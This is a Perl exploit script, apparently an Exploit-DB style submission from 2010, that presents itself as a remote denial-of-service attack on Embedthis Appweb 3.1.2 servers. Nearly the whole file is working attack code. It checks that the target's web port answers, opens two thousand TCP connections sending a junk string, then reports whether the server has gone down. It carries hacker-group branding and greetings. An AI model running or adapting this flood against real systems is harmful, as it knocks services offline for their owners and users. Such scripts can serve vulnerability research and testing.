#!/usr/bin/perl ################################################################################ # # +------------------------------------------------------------------------+ # | .......| # | ..''xxxxxxxxxxxxxxx'...| # |..'xxxxxxxxxxxxxxxxxxxxxxxxxxx..| # | ..'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'. | # | .'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'''.......'. | # | .'xxxxxxxxxxxxxxxxxxxxx''........... | # |.xxxxxxxxxxxxxxxxxx'... .........'. | # | 'xxxxxxxxxxxxxxx'......'.| # |'xxxxxxxxxxxxxx'..'x...x. | # | .xxxxxxxxxxxx'...'..... .' | # | 'xxxxxxxxx'......x.| # | xxxxxxx'...x.| # | xxxx'.....xx.| # | 'x'....'xxxxxxx'. x .x.| # | .x'. .'xxxxxxxxxxxxxx. '' .' | # |.xx..'xxxxxxxxxxxxxxxx. .'xx'''..'| # | .xx..'xxxxxxxxxxxxxxxx'.'xxxxxxxxx''.| # |.'xx'..'xxxxxxxxxxxxxxx...'xxxxxxxxxxxx'| # |.xxx'..xxxxxxxxxxxx'..'xxxxxxxxxxxxxx'. | # |.xxxx'.'xxxxxxxxx'.xxx'xxxxxxxxxx'. | # |.'xxxxxxx'.......xxxxxxx'.| # | ..'xxxxx'.. ..xxxxx'.. | # |....'xx'.....''''...| # || # |CubilFelino Security Research Labs| # |proudly presents... | # +------------------------------------------------------------------------+ # # Embedthis Appweb 3.1.2 Remote DoS # # # Greets: l1l1th (my h4x0r bab3), nitr0us, alt3kx, hkm, r1l0, b0rr3x, w01f, # w0lf47, gh0st, CHiP, corelanc0d3r and all the crew of sectester.net. # ################################################################################ # Exploit Title: Embedthis Appweb 3.1.2 Remote DoS # Date: Mar 12, 2010 # Author: chr1x # Software Link: http://embedthis.com/downloads/index.html # Version: 3.1.2 # Tested on: Windows XP SP3 (Spanish Edition) # st4rt of v00d00 c0d3 XD use HTTP::Lite; use IO::Socket; use locale; if ($#ARGV != 1) { print " ############################################################ CubilFelino Security Labs Embedthis Appweb 3.1.2 Remote DoS by chr1x\@sectester.net ############################################################ Usage: ". $0 ." -h (ip address)\n "; exit; } &main(); sub main { print " ############################################################ CubilFelino Security Labs Embedthis Appweb 3.1.2 Remote DoS by chr1x\@sectester.net ############################################################ "; # Variables $DossedIP = $ARGV[1]; # Execution functions &appWebCheck(); sleep 30; &afterDoS(); } sub appWebCheck { print "[*] Verifying that AppWeb is running at $DossedIP in port 80\n"; my $http = new HTTP::Lite; my $req = $http->request("http://$DossedIP/") or die "[*] Remote address $DossedIP seems not to be up, stopped"; if ($req) { print "[*] w00t! Appweb seems to be running! Sending DoS.. XD\n"; for ($i=1; $i<=2000; $i++) { my $sock = new IO::Socket::INET (PeerAddr => $DossedIP, PeerPort => '80', Proto => 'tcp', Type => SOCK_STREAM,); if ($sock) { print "[*] Sending Connection request Number: $i\n"; print $sock "Die Biatch!"; close($sock); }}}} sub afterDoS { $http = new HTTP::Lite; $req = $http->request("http://$DossedIP/") or die "[*] Webserver DoSsed!! Port 80 is unreacheable now."; }
体验盒子
